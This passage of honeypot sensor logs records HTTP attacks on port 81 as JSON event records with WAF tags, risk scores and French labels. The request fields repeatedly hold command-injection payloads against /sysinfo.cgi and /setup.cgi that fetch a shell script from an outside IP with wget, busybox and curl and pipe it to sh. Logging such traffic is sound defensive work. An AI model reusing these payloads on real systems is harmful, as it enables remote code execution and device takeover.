\u0022event_fingerprint\u0022: \u0022640555c4e237eb70888354f09fe6ad5784ee5865\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022cb4dd6c58421edff9380d424d7657c65\u0022, \u0022path_pattern_hash\u0022: \u00226aff1c054e67a6e0a068c48726213b60\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022query_string\u0022: \u0022action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsysinfo HTTP\/1.1\\r\\nHost: 62.3.50.3\u0022, \u0022payload_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022d5e68c83b9754406efb1b0b698625cf02555920a\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20\u2026\u0022, \u0022request_line\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bcurl%20http:\/\/91.92.40.1\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%2\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/sysinfo.cgi?action=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsysinfo%3Bbusybox%20wget%20http:\/\/91.\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 6 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":283},{"id":11860755,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59792,"dst_port":81,"service":"http","classification":"config_file_probe","waf_score":41,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022]","http_method":"GET","http_target":"\/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: \u0022cgi\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u0022168f355f1e9166b8bc52e0f454202978f12fb305\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 278, \u0022payload_entropy\u0022: 5.069050838208261, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 74.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 64, \u0022tag_count\u0022: 11, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u00222717a793debd6e26732b71a9b26c9cbf1938d1cf\u0022, \u0022event_fingerprint\u0022: \u002296df24c0f3a4a6d17d71be77ebc7e69939f8ed06\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 127, \u0022precision_signals\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022kb_rule_ids\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022backup_file_scan\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00221735d9c6cade091988eff7b43388980a\u0022, \u0022path_pattern_hash\u0022: \u00227a793259e7957dbaff63a0c99d83e638\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 64}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022query_string\u0022: \u0022next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022], \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lsetup HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\u0022, \u0022payload_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre_techniques\u0022: [\u0022T1083\u0022], \u0022mitre\u0022: \u0022T1083\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022, \u0022config_leak_scan\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022dfc0438754720df0f4d8ad41679c12d8778e3382\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Sonde fichier sensible: chemin sensible (tag interne) \u00b7 R\u00e8gle WAF \u00ab lfi-12 \u00bb \u00b7 Sonde fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20lset\u2026\u0022, \u0022request_line\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bcurl%20http:\/\/91.92.40.118\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20w\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/setup.cgi?next_file=;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20lsetup%3Bbusybox%20wget%20http:\/\/91.9\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 6 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 